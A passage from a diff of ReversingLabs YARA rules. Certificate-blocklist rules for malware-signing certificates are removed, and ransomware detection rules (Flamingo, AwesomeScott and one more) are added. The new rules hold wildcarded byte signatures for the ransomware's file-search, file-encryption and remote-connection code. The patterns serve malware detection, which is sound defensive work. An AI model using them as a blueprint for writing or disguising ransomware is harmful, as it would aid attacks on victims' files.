1384300799<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4Fda1E121B61Adeca936A6Aebe079303 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "fba98d6b-dc09-5294-ad86-2f4e0d8ad320" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2432-L2448" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "70a04c83e79c98024bacf1688bb46d80c9b8491e25dd32d6d92bf3cf61c62e48" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $encrypt_files_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? + ?? 83 EC ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 89 65 ?? C7 45 ?? ?? ?? ?? ?? 66 + 0F 57 C0 66 0F 13 45 ?? 68 ?? ?? ?? ?? 8B 75 ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 90 + 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F8 89 + 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 8B 75 ?? 89 75 ?? + 8B 5D ?? 89 5D ?? 83 FE ?? 75 ?? 85 DB 0F 84 ?? ?? ?? ?? 8B CE 0B CB 0F 84 ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 53 56 E8 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 33 C9 + 03 C6 13 CB 83 E8 ?? 89 45 ?? 83 D9 ?? 89 4D ?? 6A ?? 8B 55 ?? 52 6A ?? 6A ?? 6A ?? + 57 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? + ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 89 4D ?? 6A ?? FF 15 ?? + ?? ?? ?? 83 C4 ?? 8B F0 66 0F 57 C0 66 0F 13 45 ?? 8B 5D ?? 8B 7D ?? 90 83 7D ?? ?? + 0F 8C ?? ?? ?? ?? 7F ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? 8B D3 83 C2 ?? 8B 75 ?? 8B CE + 83 D1 ?? 8B 45 ?? 3B C8 7F ?? 7C ?? 3B 55 ?? 77 ?? BF ?? ?? ?? ?? 33 C0 8B 75 ?? 03 + } + $encrypt_files_p2 = { + F3 8B DA 89 4D ?? EB ?? 8B 7D ?? 2B FB 1B C6 8B 55 ?? 8D 34 13 03 DF 11 45 ?? 89 5D + ?? 89 45 ?? 89 7D ?? 83 7D ?? ?? 7F ?? 7C ?? 83 7D ?? ?? 73 ?? 8B 4D ?? 89 4D ?? 83 + F9 ?? 7D ?? C6 04 31 ?? 41 EB ?? 29 7D ?? 19 45 ?? 33 C0 89 45 ?? 83 F8 ?? 7D ?? 8B + 0C 85 ?? ?? ?? ?? 31 0C 86 40 EB ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 + ?? 88 04 37 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 01 + 0D ?? ?? ?? ?? 8B 55 ?? 11 15 ?? ?? ?? ?? 8B 45 ?? 50 8B 0D ?? ?? ?? ?? 51 68 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? EB ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 FF + 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? FF 15 ?? ?? ?? ?? 50 + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B + 4D ?? 8D 95 ?? ?? ?? ?? 0F B7 01 66 89 02 83 C1 ?? 83 C2 ?? 66 85 C0 75 ?? 6A ?? 8D + 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C4 ?? 83 C0 ?? 74 ?? 8B D0 8D B5 ?? ?? ?? ?? + 0F B7 0A 66 89 0E 83 C2 ?? 83 C6 ?? 66 85 C9 75 ?? 33 C9 66 89 08 8D 95 ?? ?? ?? ?? + 52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? + ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF + 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? EB ?? B8 ?? ?? ?? ?? C3 8B 65 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 + } + $search_files_p1 = { + E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 33 D2 56 50 66 89 94 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 56 52 + 66 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 56 50 89 + 74 24 ?? E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 52 68 + ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? 8D 94 24 ?? ?? ?? ?? 8B C7 2B D7 8D 9B ?? ?? ?? ?? 0F B7 08 66 89 0C 02 83 C0 + ?? 66 3B CE 75 ?? 8D 84 24 ?? ?? ?? ?? 83 C0 ?? 8D A4 24 ?? ?? ?? ?? 66 8B 48 ?? 83 + C0 ?? 66 3B CE 75 ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 08 66 8B 0D ?? ?? ?? ?? + 89 50 ?? 68 ?? ?? ?? ?? 66 89 48 ?? FF 15 ?? ?? ?? ?? 8D 54 24 ?? 52 8D 84 24 ?? ?? + ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 75 ?? 68 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 + 5D C2 ?? ?? 8D A4 24 ?? ?? ?? ?? 8B 7D ?? 8B 35 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 68 ?? + ?? ?? ?? 51 FF D6 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 54 24 ?? 68 ?? ?? ?? ?? + 52 FF D6 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 8D 44 24 + ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 0F 84 ?? ?? ?? ?? 66 83 3D ?? ?? + ?? ?? ?? BF ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B C7 8D 50 ?? EB ?? 8D 9B ?? ?? ?? ?? 66 + 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 8B CB D1 F8 8D 71 ?? 66 8B 11 83 C1 ?? 66 85 D2 + } + $search_files_p2 = { + 75 ?? 2B CE D1 F9 3B C1 75 ?? 53 57 FF 15 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 66 8B 0F + 83 C7 ?? 66 85 C9 75 ?? 66 39 0F 75 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? 64 8B 15 ?? ?? ?? ?? 8B 32 8B 55 ?? 83 C4 ?? 8D 4C 24 ?? 51 52 68 ?? ?? ?? ?? 50 + 89 46 ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 85 + C0 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 F8 ?? 7D ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + 8B 4E ?? 6A ?? 6A ?? 51 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 15 ?? ?? ?? + ?? 89 04 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 6A ?? 51 FF 15 ?? ?? ?? + ?? E9 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF + D3 8B F8 6A ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? 8B 56 ?? 6A ?? 6A ?? 52 68 ?? ?? ?? ?? 6A ?? 6A ?? FF D3 8B 0D ?? ?? ?? ?? 89 + 04 8D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 04 95 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? + E9 ?? ?? ?? ?? 8D 4C 24 ?? 51 57 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF 15 ?? ?? + ?? ?? A1 ?? ?? ?? ?? 48 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 FF D6 83 C4 ?? 85 + C0 0F 84 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C4 + ?? 85 C0 75 ?? 8D 9B ?? ?? ?? ?? 0F B7 8C 04 ?? ?? ?? ?? 66 89 8C 04 ?? ?? ?? ?? 83 + C0 ?? 66 85 C9 75 ?? 8D BC 24 ?? ?? ?? ?? 83 C7 ?? 66 8B 47 ?? 83 C7 ?? 66 85 C0 75 + ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 68 ?? ?? ?? ?? F3 A5 + FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 54 24 ?? 52 + 50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 56 FF 15 + } + $remote_connection = { + 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B 45 ?? 8B 0D ?? ?? ?? ?? 0F B6 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 3D ?? + ?? ?? ?? 8D 70 ?? 8B 00 56 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 52 0F B7 15 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 51 52 50 + 6A ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 FF D7 83 C4 ?? 80 3E ?? 74 ?? B9 ?? ?? ?? + ?? 8B C6 EB ?? 8D 49 ?? C6 00 ?? 40 49 75 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? 8D 50 ?? 8D 49 ?? 8A 08 40 84 C9 75 ?? 8D 8D ?? ?? ?? ?? 51 2B C2 + 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF D7 8D 85 ?? + ?? ?? ?? 83 C4 ?? 8D 50 ?? 8A 08 40 84 C9 75 ?? 6A ?? 2B C2 50 8D 85 ?? ?? ?? ?? 50 + 53 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 9B ?? ?? ?? ?? C6 00 ?? 40 + 49 75 ?? 53 FF 15 ?? ?? ?? ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C2 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Laizhou wanlei stone Co., LTD" and pe.signatures[i].serial=="4f:da:1e:12:1b:61:ad:ec:a9:36:a6:ae:be:07:93:03" and 1310687999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($remote_connection and ( all of ($search_files_p*)) and ( all of ($encrypt_files_p*))) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_03866Deb183Abfbf4Ff458D4De7Bd73A : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Flamingo : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Flamingo ransomware." author = "ReversingLabs" - id = "2641eb86-94f0-537c-a82a-6a5e1596ee84" - date = "2023-11-08" - modified = "2023-11-08" + id = "333ef1f9-ac54-5a3d-9b2b-50483eeb93e1" + date = "2021-04-14" + modified = "2021-04-14" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2450-L2466" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "90d09d0d2d01500e0670277d0e8de574feecf7443cf4d077912b1166a9c14c43" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Flamingo.yara#L1-L54" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "446c0d332af01c0fceb0356d5ab273eb55764869cc8343468b75625e5d4d1036" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Flamingo" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? + 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? + ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 + ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 + C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? + 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 + 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 + C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F + 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 + } + $encrypt_files = { + 68 ?? ?? ?? ?? 83 EC ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B CC C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? C6 85 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? + ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 85 + ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 68 ?? ?? + ?? ?? 51 6A ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? + C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? + C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? 8B BD ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 68 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 47 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ?? + ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? + 8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE9\\x87\\x8D\\xE5\\xBA\\x86\\xE8\\xAF\\x9D\\xE8\\xAF\\xAD\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="03:86:6d:eb:18:3a:bf:bf:4f:f4:58:d4:de:7b:d7:3a" and 1371772799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_1Be41B34127Ca9E6270830D2070Db426 : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_Awesomescott : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects AwesomeScott ransomware." author = "ReversingLabs" - id = "bee69e9d-db8e-5d4e-8e97-b3791b4f717d" - date = "2023-11-08" - modified = "2023-11-08" + id = "36d3b801-dbdb-585a-ac80-1827a6749c87" + date = "2020-09-16" + modified = "2020-09-16" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2468-L2484" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b66c4b9264be70d53838442a3112c4bacbdf2dda90840d71c3eb949e630b3f17" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.AwesomeScott.yara#L1-L101" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ed8096a4abbd015f79f4ec7239cd4070194ad70fa03da6714e499a41f9fb9423" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "AwesomeScott" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 48 8B C4 48 89 58 ?? 48 89 68 ?? 48 89 70 ?? 57 41 54 41 55 41 56 41 57 48 83 EC ?? + 45 33 FF 4C 8B F2 49 8B D8 4C 89 78 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 4C + 89 78 ?? 4C 89 78 ?? 4C 89 78 ?? 4C 89 78 ?? B8 ?? ?? ?? ?? 48 8B F1 45 33 C9 44 8B + C0 8B D0 49 8B CE 45 32 ED 48 83 CD ?? 49 8B FF FF 15 ?? ?? ?? ?? 4C 8B E0 48 3B C5 + 75 ?? FF 15 ?? ?? ?? ?? 8B D8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? + ?? ?? E9 ?? ?? ?? ?? 45 33 C9 4C 89 7C 24 ?? 48 8B CB 41 8D 51 ?? 45 8D 41 ?? C7 44 + 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B E8 48 83 F8 ?? 75 + ?? FF 15 ?? ?? ?? ?? 8B D8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? ?? + ?? E9 ?? ?? ?? ?? BB ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 4C 24 ?? 33 D2 44 8B CB + } + $encrypt_files_p2 = { + 44 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? + 4C 8D 05 ?? ?? ?? ?? 48 8D 4C 24 ?? 44 8B CB 33 D2 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? + ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C + 24 ?? 48 8D 44 24 ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? 48 89 44 24 ?? FF 15 ?? ?? ?? + ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 0D ?? ?? + ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 44 8B C0 45 33 C9 FF 15 + ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 8B + 44 24 ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 41 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 44 24 + ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? + ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 41 B8 ?? ?? ?? ?? 48 8D 15 + ?? ?? ?? ?? E9 ?? ?? ?? ?? 32 DB 90 4C 8D 4C 24 ?? 41 B8 ?? ?? ?? ?? 48 8B D7 49 8B + CC 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 81 7C 24 ?? ?? ?? ?? ?? + 48 8B 4C 24 ?? B8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F B6 DB 0F 42 D8 48 8D 44 24 + ?? 45 33 C9 48 89 44 24 ?? 44 0F B6 C3 33 D2 48 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 + } + $encrypt_files_p3 = { + 74 ?? 44 8B 44 24 ?? 4C 8D 4C 24 ?? 48 8B D7 48 8B CD 4C 89 7C 24 ?? FF 15 ?? ?? ?? + ?? 85 C0 74 ?? 84 DB 0F 84 ?? ?? ?? ?? 41 B5 ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? + ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D + 15 ?? ?? ?? ?? 44 8B C0 48 8B CE E8 ?? ?? ?? ?? 4D 85 E4 74 ?? 49 8B CC FF 15 ?? ?? + ?? ?? 48 85 ED 74 ?? 48 8B CD FF 15 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF E8 ?? ?? ?? + ?? 48 8B 4C 24 ?? 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B + D8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C + 8D 05 ?? ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 + 8D 15 ?? ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? ?? ?? 4C 89 7C 24 ?? 48 8B + 4C 24 ?? 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D8 E8 ?? + ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? + ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? + ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? ?? ?? 48 8B 4C 24 + } + $find_files = { + E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 33 F6 33 D2 41 B8 ?? ?? ?? ?? 66 89 B4 24 ?? + ?? 00 00 E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8B D7 FF 15 + ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 + F8 ?? 0F 84 ?? ?? ?? ?? 0F 1F 40 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? 41 B8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? 41 + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 4C 8D 44 + 24 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8B D7 FF 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? + ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? + 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D + 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? + ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? + ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 + 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C + 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 